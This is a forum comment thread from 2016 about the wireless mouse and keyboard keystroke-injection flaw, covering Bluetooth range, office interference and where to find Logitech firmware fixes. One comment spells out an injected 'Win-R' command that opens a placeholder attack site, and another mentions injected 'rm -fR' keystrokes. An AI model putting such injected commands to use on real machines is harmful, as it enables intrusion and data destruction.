And you're basing this on ONE test case? I don't know whether it was the logitech or the Dell stuff that sucked, but one of them must have.
Between several keyboards, mice, and laptops (logitech, microsoft, dell, and a few no-names), I've never had any real problem with bluetooth range. The 'whole house' seems to be the range - I only get problems from the furthest bedroom to the garage on the opposite side.

--
I don't read AC A human right
1. Re:Bluetooth range by Anonymous Coward · 2016-02-23 08:32 · Score: 0
  
  Maybe you missed the "bought a case" part. We have about 1,600 Dell Latitudes at this location, and for the vast majority of our users, the Bluetooth keyboards wouldn't work. They did work for the people that have a single monitor and position their docking station so the keyboard is against the left side of the laptop. The keyboards stop working if you place them on your lap.
2. Re:Bluetooth range by I4ko · 2016-02-23 08:49 · Score: 2
  
  BS. I've been using Bluetooth mice(Microsoft/ only lately Logitech) and keyboards(Logitech) with Dell laptops for more than 6 years now, and Bluetooth mice (HP, Microsoft) and Bluetooth keyboards (Apple) with Apple minis and macbooks since 2007. Never had this problem. The farthest practical distance that I used consistently (because I still need to look and see at the damn monitor, don't you need to look at it too?) is about twice my height or about 12 feet, and never had an issue. Bluetooth range is defined by classes - class I - 100m, class II - 10m, class III - 1m. Class II devices work well, and for mice and Bluetooth it is actually better to get class III as to additionally limit the range at which adversaries need to be.
3. Re:Bluetooth range by mindwhip · 2016-02-23 08:56 · Score: 4, Insightful
  
  You tried to use 1600 bluetooth keyboards and mice in relatively close proximity (probably open plan/cubicle office) and are surprised they didn't work? you probably had them all networked using wifi at the same time as well...
  
  --
  [The Universe] has gone offline.
4. Re:Bluetooth range by Firethorn · 2016-02-23 23:15 · Score: 1
  
  Nope, didn't miss that. You simply repeated the same experiment 'a case worth' of times. Same model Laptops, same production run of mice/keyboards. Hell the mice & keyboards were probably sequentially produced on the same line.
  Then, as mindwhip mentioned - how noisy is your environment? My house is a lot quieter on the 2.4Ghz zone than an office with lots of laptops connecting wireless. For one, my network is in the 5GHz.
  
  --
  I don't read AC A human right
High, actually. Re:Risk Level? by Fencepost · 2016-02-23 08:36 · Score: 4, Informative

The risk from this could actually turn out to be really high - perhaps not to any individual system, but to an office environment. TFA includes "100 meters" and "a $15 USB dongle and 15 lines of Python code" which I could believe.

The issue is that if this can be a broadcast attack, it doesn't need to be successful any more than hacking an ad network needs 100% infection rates - if I can drive up outside a multi-story office building with a cheap adapter at the end of a USB extension cable (and perhaps an appropriate dish) and broadcast "Win-R http://attacksite.site/<Enter>", how many of the PCs in window offices will load that site which loads various exploits based on detection of the browser? This is even better than spearphishing because I don't have to worry about getting through email filters, and if I manage it right I know what company/companies I targeted at what time along with my trojan access to one or more computers within those offices.

Remember, this is injection of events, not 2-way communication. There's no handshaking or anything else.

I'm going to be keeping track of this and probably pushing some customers to eliminate or at least replace some cordless equipment - that was an agenda item before, but this can make it a high-priority agenda item.

--
fencepost
just a little off
1. Re:High, actually. Re:Risk Level? by Anonymous Coward · 2016-02-23 18:01 · Score: 0
  
  I imagine firefox would open and noscript would note that it didn't do a lot of stuff.
Last Post by michaelcole · 2016-02-23 08:38 · Score: 1

Say goodbye Microsoft keyboard and mouse. Glad I had a spare :-/
Affected devices
"Working with vendors for 90 days" by michaelcole · 2016-02-23 09:06 · Score: 1

Searching for a new keyboard on Amazon and seeing all the existing USB keyboards being sold with this vulnerability really pisses me off. It's some major fucking fraud to keep selling a product with this vulnerability.
Logitech firmware update not _actually_ available? by Anonymous Coward · 2016-02-23 09:40 · Score: 1

As of 13:35 Pacific time, the updated Logitech firmware doesn't seem to be actually downloadable.
It's nice of Logitech to develop such software, but they actually have to publish it for it to make a difference.
(Tried both my OSX and Windows 7 machines, the Logitech Unify software says no updates available, nothing but questions on their forum)
So where's this Logitech firmware update? by Ingenium13 · 2016-02-23 09:42 · Score: 1

So where's this Logitech firmware update? I searched their website, looked at the downloads offered for my mouse (MX Master), and there isn't a firmware update utility. Checked all OSes.
I wish I could use just bluetooth with it instead of the dongle, but Ubuntu 14.04 doesn't seem to work with it with bluetooth... My chromebook on the other hand works flawlessly.
Download links by Anonymous Coward · 2016-02-23 10:09 · Score: 1

Here ya go...
https://forums.logitech.com/t5...
Just buy a similar keyboard/mouse by eth1 · 2016-02-23 10:17 · Score: 3, Funny

I worked as a one-man IT dept for a small private school for a few years. Someone donated a bunch of wireless keyboard/mouse sets one year, which were used by several of the teachers (without my involvement).
Shortly afterwards, I started getting odd "OMG, my computer is infected" reports. Mouses were moving on their own, and random typing was appearing out of nowhere.
The ethernet jacks were usually on shared walls, which resulted in PCs ending up on opposite sides of the same wall (only 2-3 feet apart). Since the devices only had three channels, several of these pairs had ended up on the same one, with hilarity ensuing. :)
Re:Logitech firmware update not _actually_ availab by Anonymous Coward · 2016-02-23 12:25 · Score: 0

Yeah, wtf. If you have a file available, say so. If you don't, say it will be coming shortly.
I saw a link to what looks like the newest firmware on some Dark Reading" blog, but I am not dl'ing some random file stored on some random amazon server from some random blogger. I've searched Logitech's site and the web for the filename and no such luck. I tried updating the firmware thru the Logitech software and it says the vulnerable firmware version is the most up to date. http://www.darkreading.com/endpoint/mousejack-attack-bites-non-bluetooth-wireless-mice/d/d-id/1324404
This is bullshit. I figured I was getting a more secure kb/mouse from a "reputable" company like Logitech. I won't make that mistake again.
Fuck you Logitech.
Reversed sounds worse by duke_cheetah2003 · 2016-02-23 12:26 · Score: 1

Could this hack be reversed, ie: log keystrokes from a wireless keyboard? That sounds substantially more dangerous and more useful to a hacker than sending keystrokes. I've always been wary of wireless keyboard for this reason, but mice are pretty much a non-issue if their data could be captured. Mouse data sending is probably just as useless.
Re:Logitech firmware update not _actually_ availab by Anonymous Coward · 2016-02-23 14:07 · Score: 1

Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
Logitech's response by Anonymous Coward · 2016-02-23 14:14 · Score: 1

Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
I installed this and it breaks a few things in the software, like displaying variables instead of the text in the update options, but it seems to work fine for now.
Glad I dont use wireless keyboards and mice... by jonwil · 2016-02-23 15:13 · Score: 1

Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks? Glad I am not using them on my PC then (Logitech K120 keyboard and Gigabyte GM-M6580 laser mouse)
1. Re:Glad I dont use wireless keyboards and mice... by Anonymous Coward · 2016-02-23 17:28 · Score: 0
  
  The batteries in my wireless keyboards last so long I forget they have batteries so every time the batteries do die I think my keyboard/computer is broken/frozen - at least until I finally remember I actually have power the keyboard for it to work.
2. Re:Glad I dont use wireless keyboards and mice... by NormalVisual · 2016-02-24 08:36 · Score: 1
  
  Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks?
  
  I have to replace the batteries in my BT keyboard about every six months. My BT mouse is still on its original set, two years later.
  
  --
  Please stand clear of the doors, por favor mantenganse alejado de las puertas
3. Re:Glad I dont use wireless keyboards and mice... by LordWabbit2 · 2016-02-24 19:49 · Score: 1
  
  I fail to see the point in wireless keyboard/mouse for a standard PC. I mean how fucking far do you move your keyboard in a day? A wireless mouse I might bother with on a laptop. I went the whole cordless route at one point (and I buy my keyboard/mouse in pairs, one for work and one for home) and all it meant was stealing batteries at 3 in the morning from other devices so I can finish a raid. As soon as one of the keyboards wore out (alt key on work keyboard) I replaced the lot with corded ones.
  
  --
  There are three kinds of falsehood: the first is a 'fib,' the second is a downright lie, and the third is statistics.
Logitech Firmware Updates -- where? by Anonymous Coward · 2016-02-23 20:40 · Score: 0

On the logiotech website I find neither a list of affected devices nore downloads for firmware updates. Has anyone a link? TIA!
Stupid question.... by Anonymous Coward · 2016-02-24 01:16 · Score: 0

I do have a wireless mouse and I have an odd question. The attacker could replace the mouse clicks by keystrokes to pretend "I" am writing. Good. If I type when no program is opened, what harm can it use?
I do understand that If I'm working with a konsole it can run `rm -fR' and screwup my user account (not the system, unless I'm fool enough to be logged in as root). Or if I'm writing a latex the attacker can fool me around by introducing random typos or somethings. I'm very confused, as whatever I type has only consequences to the program with the focus.
1. Re:Stupid question.... by Anonymous Coward · 2016-02-24 08:40 · Score: 0
  
  Depending on the distro, you can get to a system console using just the keyboard (Ctrl-Alt-F1 or similar). They'd still have to log in, but it's something they can still bang against.